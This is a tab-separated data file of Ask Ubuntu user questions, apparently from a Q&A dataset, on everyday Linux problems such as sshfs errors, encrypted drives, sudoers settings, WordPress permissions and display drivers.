99984	ca n't configure wireless camera through ethernet cable - ip problem	i 'm trying to setup an ip wireless camera and i have the ip address , it 's 192.168.1.217 ... but when i put this address in chromium it does n't even load ... same thing when using windows 7 [ dual boot ] . thanks ! hope you can help me .
99985	what 's the easiest installation for a home server , ubuntu desktop or ubuntu server ?	i have a dell server on which i 've been running microsoft server 2008 , i want to turn it into a simple home server for file sharing and media streaming . i 'm fairly new to linux , but understand a lot . i want to know which would be the easiest for a noob to install and get up and running . i have two hard drives , a 250gb and a 1tb , i 'll be installing the os on the 250gb drive and do n't mind loosing the rest of the space if necessary , as i 'll be using the 1tb drive for file storage . the other two computers on my network are running windows vista and i plan on keeping it that way ( at least for now ) . i 'm leaning toward desktop as it will have a gui , and make things a little more familiar for me ... then i just have to load additional 'apps ' to get the full server functionality right ? which is the best os version ( or what do i need to make sure i 'm running ) to make this machine discoverable and compatible with the windows machines ?
99987	can i remove the gwibber packages without removing ubuntu-desktop ?	gwibber as i can remove without removing important parts of ubuntu , it asks me to remove gwibber also remove ubuntu desktop
99994	is there a scope or some other way to suspend the computer from unity dash ?	i want to type suspend in the dash to suspend my computer . unity does not have this functionality by default . is there a scope which provides this ?
99996	why is ubuntu 11.10 so slow ?	i 've been using ubuntu since version 6 . i 'm a big fan . i upgraded to ubuntu 11.10 a while back . i did a clean install . ever since then , my laptop 's been generally slower . the gui is generally laggy . i know you 'll ask `` slow compared to what ? '' it 's slow compared to ubuntu 10 . and it 's much slower when compared to windows 7 on the same system . i 'm using a dell latitude e6400 , with a 2.4 ghz core 2 duo cpu , nvidia quadro nvs 160m , and 6 gigs of ram . i have a high speed 1 tb disk , with plenty of empty space . has anyone observed this ? are there any people out there with the same hardware whose systems are very fast ? thanks .
99997	sshfs 'no such file ' error	i 'm trying to use sshfs to share a folder between two of my computers . i can ssh from the server , and see the folder i want to share . however , when i run sshfs , i get : david @ desktop2 : ~ $ sshfs desktop1 : ~/folder/ ~/documents/folder/ desktop1 : ~/folder/ : no such file or directory desktop2 is running 11.10 . desktop1 is running 10.04 . i ssh from desktop2 to desktop1 and view the folder , and i can use scp to copy a file from one computer to another . what do i need to do differently for this to work ?
100000	how to install a huawei ec-226 usb modem ?	someone could tellme how to install the usb modem huawei ec-226
100004	how can i free space from a massive 39.5gb /var/log/ folder ?	i just got a message from the default disk analyses software ( baobab ) that i only have 1gb left on the hard drive . after some search , i found that the /var/log/ folder is the cause of this . some file/sizes in /var/log/ : kern.log = 12.6 gb ufw.log = 12.5 gb kern.log.1 = 6.1 gb ufw.log.1 = 6.0 gb et cetera et cetera . /var/log is huge . can i delete those files or the entire /var/log folder ? or is that a big no no in ubuntu ?
100005	tool to backup repository list	there is a utility called y-ppa-manager https : //launchpad.net/y-ppa-manager which helps to manage your ppa repositories in ubuntu . one of its best features is to backup your repository list . is there any command line or graphical tool to backup your repositories without installing any ppa tool ?
100010	no password asked at login screen just start session button with lightdm	when i first installed ubuntu i choose not to ask me for a password at login . that was ok for that moment cause it did n't ask me any password at login . but now i want to be asked for a login password . i changed the settings to not start automatically but it does n't work . my ubuntu does n't ask me password at login . what should i do now ? in the automatic login box ( in the user accounts setting window ) i have it checked to off ( 0 or off ) , the thing is that my lightdm login screen gives me only a `` start session '' button below my user name , instead of the usual password field .
100012	is there a way to 'sleep ' browser windows with tabs i 'm not currently reading ?	i typically have a lot of pdf 's open while i 'm computing . many of them are `` i 'll read this later '' rather than `` i expect to be able to immediately switch to this evince window '' . i do n't understand how ubuntu handles memory in a deep way , but it seems like these evince instances are eating up memory when they do n't need to . i would be happy if the os held the pdf open in somewhere other than ram . i imagine this is what the bg or ctrl+z command does ? that 's enough background on my understanding of the question i 'm about to ask . here it is : is there a way to 'sleep ' pdf 's , browser windows , or other stuff i 'm reading so that the rest of my system will speed up ?
100020	how to expand encrypted /home to second internal drive ?	i have a huge number of photos , and i want to move just my /pictures folder to a second sata drive in my computer for performance reasons . i want everything to work as it is now , except that /pictures will be by itself on the second drive . /home ( sda ) and the second drive ( sdb ) are encrypted . for the primary drive , i chose the encrypted home option at install . later , i added the second drive . i formatted it and chose encryption using the disk utility . i can reinstall if this all has to be done at once . what i tried so far was adding a symlink to the new drive from inside /pictures , and using pysdm ( to modify fstab ) to auto-mount the second drive at boot . since the second drive is encrypted , this did n't work . it ca n't be mounted until i login and unlock the keychain with my password . also , the symlink added an extra step in the file paths , which broke some custom links . ln -s /media/pix /home/tom/pictures and all variations of this with and without trailing slashes give me either a link inside /pictures , or no link at all . ( possibly missing something simple here ? ) drive 2 ( sdb ) is /pix , and all my pictures are in folders at its root directory . i want to click on pictures from my home folder in nautilus , and be taken directly to the root directory of the second drive . this just is n't happening . i either get a new link inside /pictures , or i 'm taken to the empty /pictures folder ( on sda ) what 's the best way to do this ? it 's important to keep everything encrypted , and have /pictures work just like if it was in /home . i also need my automatic backups to be collecting the photos in their new location . **edits i tried following raof 's answer but i 'm stuck now . here 's how far i got : cryptsetup was already installed , i edited it and copied the suggestion exactly , it now looks like this : # < target name > < source device > < key file > < options > cryptswap1 /dev/sda2 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 sdb_crypt uuid= < redacted > -4ef3-a4ff-7c9db92025d7 none luks i have an encrypted /home obviously , that 's the other entry . ls -lah /dev/disks/by-uuid simply did n't work , i get `` ls : can not access /dev/disks/by-uuid : no such file or directory '' ls -l /dev/disk/by-uuid/ does work , it 's the method here on the ubuntu help page that gives me the following : ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -40ba-be89-9591daf722c9 - > ../../sdd1 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -4ef3-a4ff-7c9db92025d7 - > ../../sdb1 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -49da-bcca-879e44afe63c - > ../../sda1 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -4cee-9ef7-c745ee596438 - > ../../dm-1 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -48ed-9725-5179cd588c28 - > ../../dm-0 lrwxrwxrwx 1 root root 10 2012-02-06 08:15 < redacted > -4bb6-bf6e-197af4d6afdc - > ../../sdc1 the problem now is with fstab . i have tried several variations , and none work so far . here 's what i started with : uuid= < redacted > -4bb6-bf6e-197af4d6afdc /home ext4 defaults 0 2 uuid= < redacted > -4ef3-a4ff-7c9db92025d7 /media/sdb1 crypto_luks noauto 0 0 uuid= < redacted > -49da-bcca-879e44afe63c / ext4 defaults 0 1 uuid= < redacted > -4cee-9ef7-c745ee596438 /media/pix ext4 noauto 0 0 which tries to mount the encrypted partition at boot , which is too early since i have n't entered my password yet . i removed the last line and changed the second entry to auto , like below . uuid= < redacted > -4bb6-bf6e-197af4d6afdc /home ext4 defaults 0 2 uuid= < redacted > -4ef3-a4ff-7c9db92025d7 /media/sdb1 crypto_luks auto 0 0 uuid= < redacted > -49da-bcca-879e44afe63c / ext4 defaults 0 1 this asked me for my passphrase for /sdb_crypt ( with uuid ) at grub , before i can even login . i entered the password for the drive but i guess passphrase=/=password , this failed . i restored the backup fstab from a live cd , but now but i do n't understand how to `` edit /etc/fstab so that it mounts /dev/mapper/sdb_crypt in the right place . '' from raof 's answer . any ideas ? and now i suspect i have more entries than i need in fstab , which to remove ?
100021	ltsp client synchronize blackberry address book & calendar with evolution	i 'm trying to setup blackberry sync'ing with evolution on a ltsp client . it works on the server . i 'm using ubuntu 10.04 64bit on the server and here are the instructions i 've followed to get the server working : install required syncing packages $ sudo apt-get install libopensync0 multisync-tools libbarry0 opensync-plugin-evolution opensync-plugin-barry $ msynctool -- addgroup bb $ msynctool -- addmember bb barry-sync $ msynctool -- addmember bb evo2-sync $ msynctool -- showgroup bb find pin number on phone and entered it in to the config $ msynctool -- configure bb 1 syncing $ msynctool -- sync bb this all works but it 's no good as the user logs into their thin client not the server . running the same steps on the client i get the error : : synchronizing group `` bbtofile '' : unable to connect : error while synchronizing : unable to open fifo at first i thought this would be a usb issue , as i was plugging the device into the client and using a server side program . so i installed the following into my thin client image , rebuilt it and rebooted the client : $ sudo apt-get install libopensync0 multisync-tools libbarry0 opensync-plugin-evolution opensync-plugin-barry barry-util multisync0.90 on the client after reboot i tried the following command $ ltsp-localapps xterm within xterm $ msynctool -- sync bb i get the same error ! so i tried btool $ btool -m btool displays contactldif mapping information from the blackberry , so it 's seeing the device . if i unplug the device and type btool -m it tells me 'no device found' here are the two debug logs i get when trying to sync on the client : thread3078059712-6396.log ... [ 1327296051.50333 ] > > > > > > > osync_member_load ( 0x9ea8480 , /home/dean/.opensync-0.22/group2/2 , 0xbfb7c50c ) [ 1327296051.52517 ] < < < < < < < osync_member_load : loaded member : 0x9e9d298 [ 1327296051.53929 ] < < < < < < < osync_group_load [ 1327296051.55233 ] +++++++++ this is the client # 1 ( barry-sync plugin ) of group test [ 1327296051.56548 ] > > > > > > > osync_queue_new ( /home/dean/.opensync-0.22/group2/1/pluginpipe , 0xbfb7c50c ) [ 1327296051.57914 ] < < < < < < < osync_queue_new : 0x9e9cda0 [ 1327296051.60535 ] < -- - error -- - main : unable to connect thread3079096000-6395.log ... osync_queue_new ( /home/dean/.opensync-0.22/group2/2/enginepipe , 0xbf8bdd08 ) [ 1327296050.887129 ] < < < < < < < osync_queue_new : 0x84250c8 [ 1327296050.888562 ] < < < < < < < osync_client_new : 0x8424dc8 [ 1327296050.890041 ] > > > > > > > osengine_mappingtable_new ( 0x8424500 ) [ 1327296050.891511 ] osengine_mappingview_new ( 0x8425508 ) [ 1327296050.892941 ] osengine_mappingview_new ( 0x8424a78 ) [ 1327296050.894376 ] < < < < < < < osengine_mappingtable_new : 0x8425678 [ 1327296050.895807 ] < < < < < < < osengine_new : 0x8424500 [ 1327296050.897254 ] > > > > > > > osengine_init ( 0x8424500 , 0xbf8bdd08 ) [ 1327296050.898717 ] > > > > > > > osync_group_lock ( 0x8420268 ) [ 1327296050.900192 ] [ grp ] full debug : locking file /home/dean/.opensync-0.22/group2/lock [ 1327296050.904136 ] [ grp ] full debug : successfully locked [ 1327296050.905556 ] < < < < < < < osync_group_lock : osync_lock_ok [ 1327296050.906992 ] spawning clients [ 1327296050.909177 ] > > > > > > > osync_client_spawn ( 0x84255e0 , 0x8424500 , 0xbf8bdd08 ) [ 1327296050.918226 ] waiting for other side to create fifo [ 1327296051.921123 ] waiting for other side to create fifo [ 1327296052.924263 ] waiting for other side to create fifo [ 1327296053.927407 ] waiting for other side to create fifo [ 1327296054.930439 ] waiting for other side to create fifo [ 1327296055.933628 ] waiting for other side to create fifo [ 1327296056.936901 ] queue was created * [ 1327296056.944148 ] < -- - error -- - osync_client_spawn : unable to open fifo * [ 1327296056.945649 ] [ grp ] full debug : unlocking group test [ 1327296056.947855 ] < -- - error -- - osengine_init : unable to open fifo [ 1327296056.949077 ] > > > > > > > osengine_free ( 0x8424500 ) [ 1327296056.950923 ] > > > > > > > osync_client_free ( 0x84255e0 ) [ 1327296056.952270 ] > > > > > > > osync_queue_free ( 0x8424a28 ) [ 1327296056.953582 ] < < < < < < < osync_queue_free [ 1327296056.954644 ] > > > > > > > osync_queue_free ( 0x8424bc8 ) [ 1327296056.956703 ] < < < < < < < osync_queue_free [ 1327296056.958002 ] < < < < < < < osync_client_free [ 1327296056.959311 ] > > > > > > > osync_client_free ( 0x8424dc8 ) [ 1327296056.960621 ] > > > > > > > osync_queue_free ( 0x8424f28 ) [ 1327296056.961947 ] < < < < < < < osync_queue_free [ 1327296056.963243 ] > > > > > > > osync_queue_free ( 0x84250c8 ) [ 1327296056.964282 ] < < < < < < < osync_queue_free [ 1327296056.965580 ] < < < < < < < osync_client_free [ 1327296056.966891 ] > > > > > > > osengine_mappingtable_free ( 0x8425678 ) [ 1327296056.968179 ] free mappings [ 1327296056.969471 ] free unmapped [ 1327296056.970866 ] osengine_mappingview_free ( 0x8425508 ) [ 1327296056.972018 ] osengine_mappingview_free ( 0x8424a78 ) [ 1327296056.973320 ] < < < < < < < osengine_mappingtable_free [ 1327296056.974651 ] < < < < < < < osengine_free [ 1327296056.975972 ] > > > > > > > osync_env_finalize ( 0x841d008 , 0xbf8be19c ) [ 1327296056.977317 ] osync_plugin_free ( 0x84299e0 ) [ 1327296056.978690 ] osync_plugin_free ( 0x8435ce8 ) [ 1327296056.980100 ] osync_plugin_free ( 0x8436540 ) [ 1327296056.981443 ] osync_module_unload ( 0x841d008 , 0x84298c0 ) [ 1327296056.982661 ] osync_module_unload ( 0x841d008 , 0x8429840 ) [ 1327296056.983849 ] osync_module_unload ( 0x841d008 , 0x8436120 ) [ 1327296056.984954 ] osync_module_unload ( 0x841d008 , 0x8436a20 ) [ 1327296056.986264 ] osync_module_unload ( 0x841d008 , 0x8436c98 ) [ 1327296056.987456 ] osync_module_unload ( 0x841d008 , 0x8437160 ) [ 1327296056.988763 ] osync_module_unload ( 0x841d008 , 0x8437708 ) [ 1327296056.990114 ] osync_module_unload ( 0x841d008 , 0x8437f20 ) [ 1327296056.991470 ] osync_module_unload ( 0x841d008 , 0x8437f60 ) [ 1327296056.992781 ] osync_module_unload ( 0x841d008 , 0x8438a90 ) [ 1327296056.994129 ] osync_module_unload ( 0x841d008 , 0x84397c8 ) [ 1327296056.995480 ] osync_module_unload ( 0x841d008 , 0x8439d60 ) [ 1327296056.996832 ] osync_module_unload ( 0x841d008 , 0x843a398 ) [ 1327296056.998142 ] osync_module_unload ( 0x841d008 , 0x843a3e0 ) [ 1327296056.999456 ] osync_module_unload ( 0x841d008 , 0x843a8a8 ) [ 1327296057.869 ] < < < < < < < osync_env_finalize so i 'm close but i do n't know why i can not get the sync working .
100026	is there a configuration that let 's me run the desktop from 9.10 ?	just installed ubuntu 11.10 and it runs so slow , even with all effects and services turned off . i put in ubuntu 9.10 on my computer the other day and it runs like a dream . i even find ubuntu 9.10 more visually appealing than 10.04 onwards . i also like the extra effects that you can make in appearance , they just look better . my question is : - is there an existing distribution ( or a way to create one ) based on gnome 2.x that has the latest security updates , a software for handling drivers like jockey-gtk , and the latest ubuntu repositories ? i have tried to use debian squeeze , which is close to what i want , but my main criticisms are that the repositories are out-of-date and there is no simple application for installing proprietary drivers like jockey-gtk in ubuntu ( which i 've tried running on debian with little success ) . i 'd really appreciate anything you can tell me to help me achieve this , but please do n't suggest gnome fallback session . it still runs very slowly ( and does n't look the same ) . i 'm not here to provoke anybody , it is just the environment i work best in . thanks in advance
100028	ubuntu 10.04,10.10,11.10 boot but do n't load after fresh install , graphics to blame ?	i 've been running ubuntu fine few months ago then decided to reinstall everything and get a fresh start . after about few months of windows i could n't stand it and re-installed ubuntu . it was all running nice and smooth installation and got up to the restarting point : restarted after fresh install of ubuntu on top of windows 7 ultimate 64-bit everything was running fine grub and all i selected ubuntu started loading and it stops at 2 different points when running 2 screens it has `` _ '' in top left corner flashing or just a blank screen displays `` [ ok ] '' and in next line `` _ '' flashes . test with one screen fresh install some random flashes of loadscreen or background repeatedly ( looks as though gpu drivers or something were going really bad ) . my rig : asus m4a89gtd pro/usb3 vtx 3d 6970 8gb kingston ddr3 ram amd phenom 2 x6 1100t ( anything else needed please leave a note )
100031	running a 32bit executable	i am trying to run a 32bit executable on my 64bit oneric . here a short overview of the situation . but i have to prepend ia32 libs are installed : > aptitude search ia32 i ia32-libs - ia32 shared libraries for use on amd64 and ia64 syste first of all i tested the filetype : > file tipp10 tipp10 : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.4 , not stripped i am using 64bit oneric , with the not so recent kernel , because i did n't restart yet . > uname -a linux christchurch 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux as i said normal execution does n't work . it aborts with file or directory not found . > strace ./tipp10 execve ( `` ./tipp10 '' , [ `` ./tipp10 '' ] , [ /* 46 vars */ ] ) = -1 enoent ( no such file or directory ) dup ( 2 ) = 3 fcntl ( 3 , f_getfl ) = 0x8002 ( flags o_rdwr|o_largefile ) fstat ( 3 , { st_mode=s_ifchr|0620 , st_rdev=makedev ( 136 , 2 ) , ... } ) = 0 [ ... ] here the ldd output on my system . on my 64bit debian server the programm is reconized as a dynamic linked programm and a few lib references are outputed . but on my ubuntu : > ldd tipp10 \tdas programm ist nicht dynamisch gelinkt # german for : `` the programm is not linked dynamic '' can anyone help me please . i do n't unterstand what is going on .
100032	what will be the default python interpreter for 12.04 ?	i do n't even have python 3 interpreter currently , and was surprised by this wikipedia article : link while i searched for 12.04 release date . it mentiones python 3.2 as default python interpreter in ubuntu 12.04 , while imho i would n't have expected python 3 so soon . is wikipedia information correct ? i found also this : link but it 's not clear as which would be default
100033	3-finger tap getting prematurely grabbed	recently i upgraded from ubuntu 11.04 to 11.04 . by default 2-finger tap was set to right click and 3-finger tap ( 3ft ) to middle click ( button 3 ) . 2-finger tap works fine when i set tap-action to x x x x 1 3 2 or x x x x 1 2 3 , meaning that , it 's not the middle click event that is being grabbed but the 3ft , before it even gets translated to an event defined by tap-action . proof that 3ft is in fact detected is that whenever i 3ft inside an unmaximized window i get this : . i followed instructions from the ubuntu forums but my system got really unstable for an unknown reason : from sporadic log-offs to frozen screens to tap-click not working at login . i reinstalled 11.10 because of it and now i 'm posting this . any one can see through this problem ?
100034	is there a standard or recommended sound lib in ubuntu ?	sound is kind of fractured in the linux world . there is alsa , open sound , pulseaudio , openal ... is there one `` favoured '' or `` standard '' or `` recommended '' lib to use in sound-emitting software in ubuntu ? ( i 'm particularly interested in videogames )
100035	ubuntu or xubuntu on old computer	we 've got an old computer at home which has really been left unused for a few years . it was the 'family computer ' for a few years , and it is absolutely clogged down with programs , and runs so slowly it is almost useless - i 'm sure you know the type . i think we got it new in 2004 , and from memory , the specs are : 512 mb ram 40 gb harddrive 2.0 ghz processor i 'll have to double check about the graphics card , but i 'm pretty sure it 's less than 128 mb anyway , a friend recommended ubuntu to give this old computer a new lease on life , but i just wanted to ask here if there 's anything i ought to know before going ahead with this . in particular , should i use an older version of ubuntu , or possibly xubuntu ( which i 've seen people talk about here ) , as for me quick response is far more important than flashy icons that may lag when you click them . i 'd rather not spend any more money on hardware . as i say , this computer is effectively unused today , and if we could just restore it for lag-less web browsing and word processing i think we 'd call this a success . thanks for your help !
100037	xorg 11.10 kernel 3.0.0-16-generic running extremely high cpu memory . was a bug introduced in recent update ?	so any luck with this yet ? i am running kubuntu 11.10 x86_64 kernel 3.0.0-16-generic i7 @ 3.8ghz 24gb ram nvidia gtx 260 running the 290.10 drivers this actually did n't start happening until i updated the kernel however it is the same effect , /usr/bin/x is running way over 575m < -virt 450m < -res ~80 % cpu almost constantly . my machine is lagging hardcore . i used to be able to run multiple vm 's hundreds of tabs on chrome etc.. and now i can barely use my system . i 've got the performance settings in xorg.conf | | -- > device `` device0 '' | | | -- > driver `` nvidia '' | | | -- > vendorname `` nvidia corporation '' | | | -- > boardname `` geforce gtx 260 '' | | | -- > option `` useevents '' `` on '' | | | -- > option `` coolbits '' `` 1 '' | | | -- > option `` renderaccel '' `` o '' i have n't changed anything as far as programs i am running , and since this bug was introduced in the last big update i was wondering if there was a known issue that i could track , or if anyone has any suggestions on how to track down the offender that is causing xorg to run like this ?
100039	l2tp vpn connection plugin ?	i have l2tp vpn connection working on my android ... i wanted to add this to ubuntu through vpn connections , but i only found pptp plugin installed , i 've searched a lot to find a way to add a lt2p plugin with no success ! ! i m wondering is it that hard ? any solution ? thanks
100042	how do i put google chrome on my launcher ?	i recently installed chrome on ubuntu , and i can run chrome via google-chrome on the command line . however , how can i put a chrome icon on my dock ?
100046	unable to install any packages due to unrecoverable fatal error /var/lib/dpkg/diversions	i am currently unable to install any packages . i receive the following error : dpkg : unrecoverable fatal error , aborting : too-long line or missing newline in `/var/lib/dpkg/diversions i have tried various approaches : sudo dpkg -- configure -a sudo apt-get clean sudo dpkg-divert -- list sudo apt-get check sudo apt-get install -f etc . but all to no avail . either the output was apparently normal or the error above was thrown . i 'm stumped as to how to proceed and would appreciate any assistance . if any further info is required just ask . thanks for the reply . i followed the suggestions and am now getting a different error : ( reading database ... 50 % dpkg : unrecoverable fatal error , aborting : files list file for package 'libksane0 ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) here is the link for the current diversions : http : //paste.ubuntu.com/823500/ and the old broken one : http : //paste.ubuntu.com/823502/ i tried to reinstall libksane0 but the same error occurred .
100051	why is sudoers nopasswd option not working ?	i have a nopasswd line in /etc/sudoers ( edited with visudo ) gatoatigrado all= ( all ) nopasswd : /bin/set-slow-cpufreq however , the output is , gatoatigrado @ coral : ~ > sudo -n /bin/set-slow-cpufreq sudo : sorry , a password is required to run sudo this kind of command works on an opensuse machine , but not on ubuntu 11.10 . what am i doing wrong ? note : i can not find any relevant system log messages , e.g . via tail -f /var/log/syslog . edit here is /etc/sudoers . defaults env_reset # things i 've tried copying from an opensuse machine defaults always_set_home defaults env_keep = `` lang lc_address lc_ctype lc_collate lc_identification lc_measurement lc_messages lc_monetary lc_name lc_numeric lc_paper lc_telephone lc_time lc_all language linguas xdg_session_cookie '' root all= ( all : all ) all gatoatigrado all=nopasswd : /bin/set-slow-cpufreq % admin all= ( all ) all % sudo all= ( all : all ) all
100052	modify the ssh welcome message to include system ip address	i have had a couple of occasions where i was unable to remember the ip address for a given system but was , at the time , able to connect using the hostname . as an example , just now i wanted to set up port forwarding on my router and could n't remember the ip for the target system . i am wondering if it is possible to add the system 's ip address to the welcome message that gets displayed on an ssh connection . the default welcome message that i am trying to modify , in case that term is ambiguous , is '' linux [ hostname ] 2.6.35-32-generic # 64-ubuntu smp tue jan 3 00:47:07 utc 2012 x86_64 gnu/linux ubuntu 10.10 welcome to ubuntu ! * documentation : https : //help.ubuntu.com/ somewhere in there i think i 'd like to add the ip address of the system i just logged in to . any suggestions ? other than trading in my brain for a newer model with more ram ?
100053	fraps like programs for ubuntu ?	are there any programs for ubuntu that records the screen like fraps specifically for games ?
100055	what xmpp servers are available ?	i am looking for an xmpp server to install on my ubuntu server , but so far could n't find any comparisons of the pros and cons of different implementations . is there an implementation that is a defacto-standard ( like , say , apache for http ) ? the features the server should have are : to play nicely with ubuntu ( preferably to already be in the package sources ) to support encryption to be easily configurable over the console
100056	ltsp overlays for fat-clients	i 've been using ltsp5.2 under ubuntu for a while , mostly with mythbuntu . when i used to create a client image with the mythbuntu switches it created an overlay to store data for each client persistently over reboots . i could store any files in there i wanted specifically for that client . now that the mythbuntu switches are broken i 'm going to use fat-client instead as they are maintained and work . however this does not create an overlay section . do i require an overlay section anymore ? can i create one anyway ? i found it good for putting settings in there per client . should i be using lts.conf instead ? reference to the overlay which was in mythbuntu 804 : https : //help.ubuntu.com/community/mythtv/install/hardy/diskless
100057	ubuntu software center not working - `` check your internet connection ''	whenever i try to install any package , i get the error `` unable to download packages '' , `` check your internet connection '' . but the strange part is that i can use synaptic to download and install the same packages . any help would be great . thanks .
100062	now only boots with vga graphics	on boot i can only configure a max resolution of 1024x768 now after booting this morning . i ended up reinstalling ubuntu 11.10 and still am limited to this as the max resolution . the display is detected as unknown . my graphics are on chip intel 2500k ( intel hd 3000 graphics ) , the monitor is a dell 2209w . the reinstalled system has been updated to the latest packages ( there 's no more updates to apply ) . all has been fine until i updated the repositories last night . other than that there 's nothing really unique about my system . slioch @ slioch-desktop : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis )
100069	battery icon can not be found	my ubuntu11.10 on toshiba satellite l600 can not find the battery . it does n't show battery icon . i do n't know how much energy left . i am so sad .
100074	how do i adjust display size , not resolution ?	i have my ubuntu 11.10 pc plugged into a tv using an hdmi input . the edges of the screen get cut off , and i ca n't adjust the television 's settings for hdmi . i can adujust the `` position and size '' on the tv for all other inputs , but not hdmi for some reason , i guess it 's just a limitation of the tv itself . ubuntu detects my tv and only offers one display resolution , 1280x720 ( 16:9 ) is there a way to scale down the display so that the edges wo n't get cut off ?
100078	rights to give to wordpress files	i tried to set up a local wordpress website , accessible only from the localhost . i can not edit anything . here is a sample of what the command ls -l gives in /var/www/wordpress/ : total 304 -rw-r -- r -- 1 www-data root 397 2008-05-25 15:33 index.php drwxr-xr-x 7 www-data root 4096 2012-01-24 21:27 wp-admin -rw-r -- r -- 1 www-data root 3926 2010-05-06 10:38 wp-comments-post.php lrwxrwxrwx 1 www-data root 28 2011-02-12 02:22 wp-config.php - > /etc/wordpress/wp-config.php and this is what ls -l /var/www/wordpress gives : lrwxrwxrwx 1 www-data www-data 20 2012-01-24 21:28 /var/www/wordpress - > /usr/share/wordpress i tried the command sudo chown -r www-data : www-data /var/www/ but a ls -l in /var/www/wordpress/ still lists the files as belonging to the root group ! have i messed up with symlinks ? to which files should i give myself read-write-execute rights ? i ask the question since i am reluctant to give myself those rwx rights in anything but the home directory .
100082	how do i install gnome-shell without internet ?	i wan na know how to install gnome-shell without an internet connection . can you tell me what are the dependencies that i have to download ?
100084	why should my business choose ubuntu ?	my office is going to buy a bulk number of desktop pcs ( for developmental purposes ) . i encouraged them to buy pcs without a pre-installed os and then install linux . my colleagues agree with me but they are not regular users of any linux-based os , so they want to choose a linux os which is best for our purposes and user-friendly and i suggested ubuntu . now i want some data to support my position , what 's so good about linux and specifically ubuntu ?
100085	need to mount second internal hard drive to specific location	i 'm running ubuntu 11.10 desktop on an old server . the ubuntu os is running on a 250gb hard drive and the files i want to share on on a second 1tb hard drive mounted in the server . the 1tb drive auto mounted to /media/new volume in ubuntu . but because it is mounted under /media my windows vista machines ca n't see the correct file path since it seems i ca n't share /media ... is there anyway to direct/force ubuntu to mount the secondary hard drive under /home/public ? any advice ?
100086	how to find all pdf files in directories and their subdirectories ?	i want to list all pdf files in the directories of the current working directory . what command can do this ? i remember a combination of ls and */*.pdf but do n't remember what exact combination .
100090	how do i install the driver for my linksys ae1200 wireless-n usb adapter ?	i recently downloaded ubuntu from the main website with the hopes of dual booting it with windows . while the operating system works , it says that i need to install a driver for my graphics card . when i type in my password the installation fails . i figure it is because i need internet access . i tried to install my wifi usb adapter with the installation disc but ubuntu does n't seem to run the setup when i click the exe . what are my available solutions as i would really like to use ubuntu from my programming and windows for my gaming needs ? the name as read on the box is : linksys ae1200 wireless- n usb adapter the description reads as such : id 13b1:0039 linksys ( a comma messed up format ) id 046d:0a0b logitech , inc. clearchat pro usb ( headset )
100092	network bridge - without destroying network manager	i have seen a lot of questions related to bridge and network manager . however none of them seem to apply to what i seen and want . i setup my bridge in /etc/network/interfaces . this works perfectly ; it uses a nice static ip etc . however once i rebooted , the network manager says it is unmanaged ( as in it ca n't manage the bridge/connections ) . now this would normally be fine , but i kind of need/want something else on this computer as well . the first question is : is it possible using openvpn ( or any other vpn ) connection on a bridged interface ? if so , how do i get network manager to manage the bridged interface ? ( as at this point vpn is set up there , but does n't work/connect because it 's unmanaged . )
100094	title bar in xfce panel	i have a netbook with ubuntu oneiric ( 11.10 ) installed with xfce . due to the limited vertical space available , i would like to have the title bar for a maximized window appear in the xfce panel . i use to be able to do this on ubuntu 10.04 ( gnome2 ) with maximus and window-picker-applet . i 'm not using gnome shell or unity ( including 2d ) because they run too slow on my netbook . i 've looked at how do i enable the globalmenu / appmenu on xfce or lxde ? . it does n't help me though because it 's only for getting the menu to appear in the panel ( using xfce4-appmenu-plugin ) . is there something similar but mimicking the title bar ? it appears as though xfce4-xfapplet-plugin has been removed in ubuntu 11.10 . any help or suggestions would be greatly appreciated .
100095	wired networking issues	i am having some strange networking problems with ubuntu 11.10 . this is a fresh install but this same machine worked fine with 11.10 before . i actually reinstalled with the very same cd and there has been no hardware changes to my computer . this is on wired ethernet . in firefox i ca n't post to phpbb forums ( i hit submit and it keeps loading while nothing happens ) and uploading to imgur is stuck at 0 % . i ca n't log into email sometimes . in both chromium and midori ( both use webkit ) , i can sometimes post to phpbb forums other times it does not work ( same as firefox ) . imgur uploads go to 100 % then are stuck . i ca n't log into email sometimes . i ca n't login to this very site ( using win7 for post ) . also when i tried to authenticate to askubuntu using openid and launchpad , i gave my launchpad username , signed in to launchpad and when i was asked to allow to authenticate to ask ubuntu , the page would be stuck loading then give me a error 408 request timeout . so i ca n't even log in to askubuntu from ubuntu . note : everything works fine on the same machine with windows 7 . i tried disabling the firewall ( ufw ) and that made no difference . i really want to punch my computer as hard as i can . i am so close to changing distros , heck when i used gentoo i had better networking !
100100	how can one control quodlibet through media keys ?	the last time i used quodlibet i found out that one had to enable 2 plugins for the media keys to work with it . one had something to do with dbus and the other one with an mpris thing . i enabled both plugins now that i have begun to use it again , but media keys still wo n't work , what am i missing ?
100103	user account password removed but terminal still asking for password	i 'm new to ubuntu . i recently installed 11.10 and removed the user account password . however , now when i try to do anything in terminal , it always ask for password even though i do n't have a password set . i can not perform any `` sudo '' commands without entering a password . i 've try to press enter without typing anything for the password and i get `` sorry , try again . '' any advise will be appreciated .
100107	ca n't succesfully run juju bootstrap	what should i do to correct this error ? error could not find any cobbler systems marked as available and configured for network boot .
100109	does ubuntu support dell inspiron one 2310 with nvidia geforce 520mx ?	i have found that ubuntu support dell inspiron one 2310 with amd video card , but i 'm not sure it support nvidia geforce 520mx or not ? ps : i have tried my best to install the driver for 520mx on fedora , but never success .
